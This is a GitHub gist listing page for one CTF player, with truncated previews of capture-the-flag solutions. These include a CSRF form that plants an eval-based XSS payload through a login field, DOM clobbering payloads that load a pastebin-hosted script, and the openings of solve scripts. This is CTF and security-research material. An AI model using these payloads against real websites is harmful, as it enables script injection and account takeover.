Skip to content

Instantly share code, notes, and snippets.

View terjanq's full-sized avatar

terjanq

820 followers · 10 following
View GitHub Profile
@terjanq
terjanq / real-monster.html
Created November 6, 2022 10:23
The Real Monster
<iframe name="xxx"></iframe>
<form method=POST target=xxx action="https://ctftime.pl/login">
<input name="username" value='<script>eval(unescape(location.hash.slice(1)))</script>","password":"123"};SameSite=none;Secure;Path=/profile;'>
<input name="password" value="123">
</form>
<script>
(async () =>{
const sleep = d => new Promise(r=>setTimeout(r,d));
@terjanq
terjanq / writeup.md
Last active May 20, 2021 01:43
Politer Note - writeup

Write-up

Solution

<a id=bad1 href='cid:="</div">'>
<a id=good1 href="cid:></script><iframe srcdoc='$'">

<a id=bad2 href="http://politernotepad.zajebistyc.tf/static/badwords.js">
<a id=good2 href='data:,alert(/greetings from terjanq/)"></script>'>
@terjanq
terjanq / scriptless_solve.html
Last active June 13, 2020 19:30
Solution to Scriptless challenge from Pwn2win 2020 CTF
<body>
</body>
<script>
/*
Quasi-scriptless (3 solves)
@terjanq
terjanq / part1.py
Last active April 20, 2020 18:21
Stegasaurus Ccratch solution (PlaidCTF 2020)
# The solution comes from the paper https://sci-hub.tw/10.1007/BF03025305
# Which I got from p4 team.
import random
from math import factorial
SET_SIZE = 8
MAX_VAL = 40000
# get random 8 integers
@terjanq
terjanq / writeupBin_for_bots.py
Created December 29, 2019 20:24
Payload to WriteupBin hxp2019 CTF
from flask import Flask
import time
import requests
import os
import re
import sys
app = Flask(__name__)
@terjanq
terjanq / car_repair.js
Created October 24, 2019 12:15
Solutions from hacklu 2019 CTF
/*
* This is a solution to "Car repair shop" challenge from hack.lu ctf 2019
* Solves: 9
* 10/23/2019 © by terjanq
*/
/* The idea of the solution is: */
function WoW(){ this.Oo = 'O.o'; }
var x = new WoW();
@terjanq
terjanq / solution-225.html
Last active September 25, 2019 10:25
XSS Challenge DOM Clobbering
<!-- 225 char solution (remove new lines) -->
<a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol>
<form id=CONFIG>
<img id=testPath name=test>
@terjanq
terjanq / solution-212.html
Last active September 24, 2019 13:36
XSS Challenge DOM Clobbering
<!-- Solution 212! (remove new lines) -->
<a id=CONFIG name=test>
<p>
<a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol>
<p>
T
@terjanq
terjanq / solution-214.html
Created September 23, 2019 20:38
XSS Challenge DOM Clobbering
<!-- Solution 214 - with a strange behaviour in browsers (remove new lines) -->
<a href=//pastebin.com/how-can-i-escape-this%2f..%2fraw/LiE18yqs? id=testPath name=protocol>
<form id=CONFIG>
<img id=test>
<a>
@terjanq
terjanq / straight-forward-solution.html
Last active September 23, 2019 15:45
XSS Challenge DOM Clobbering
<a href="https://pastebin.com" id="testPath"></a>
<a id="CONFIG" name=test></a>
<a id="CONFIG" name="version" href="cid:/../../../../how-can-i-escape-this%2f..%2fraw/LiE18yqs?"></a>